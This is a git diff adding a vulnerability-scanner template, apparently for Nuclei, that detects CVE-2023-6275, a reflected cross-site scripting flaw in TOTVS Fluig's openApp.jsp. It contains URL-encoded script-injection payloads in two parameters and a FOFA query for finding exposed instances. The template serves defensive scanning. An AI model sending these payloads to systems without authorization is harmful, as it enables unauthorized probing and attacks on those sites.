diff --git a/http/cves/2023/CVE-2023-6275.yaml b/http/cves/2023/CVE-2023-6275.yaml new file mode 100644 index 0000000000..84f450d207 --- /dev/null +++ b/http/cves/2023/CVE-2023-6275.yaml @@ -0,0 +1,52 @@ +id: CVE-2023-6275 + +info: + name: TOTVS Fluig Platform - Cross-Site Scripting + author: s4e-io + severity: medium + description: | + A vulnerability was found in TOTVS Fluig Platform 1.6.x/1.7.x/1.8.0/1.8.1. It has been rated as problematic. Affected by this issue is some unknown functionality of the file /mobileredir/openApp.jsp of the component mobileredir. The manipulation of the argument redirectUrl/user with the input "> leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. + reference: + - https://github.com/erickfernandox/CVE-2023-6275 + - https://nvd.nist.gov/vuln/detail/CVE-2023-6275 + - https://vuldb.com/?id.246104 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2023-6275 + cwe-id: CWE-79 + epss-score: 0.00075 + epss-percentile: 0.33269 + cpe: cpe:2.3:a:totvs:fluig:*:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 2 + vendor: totvs + product: fluig + fofa-query: app="TOTVS-Fluig" + tags: cve,cve2023,xss,fluig + +http: + - method: GET + path: + - "{{BaseURL}}/mobileredir/openApp.jsp?redirectUrl=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E" + - "{{BaseURL}}/mobileredir/openApp.jsp?user=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E" + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - '">' + - 'fluig://' + condition: and + + - type: word + part: content_type + words: + - 'text/html' + + - type: status + status: + - 200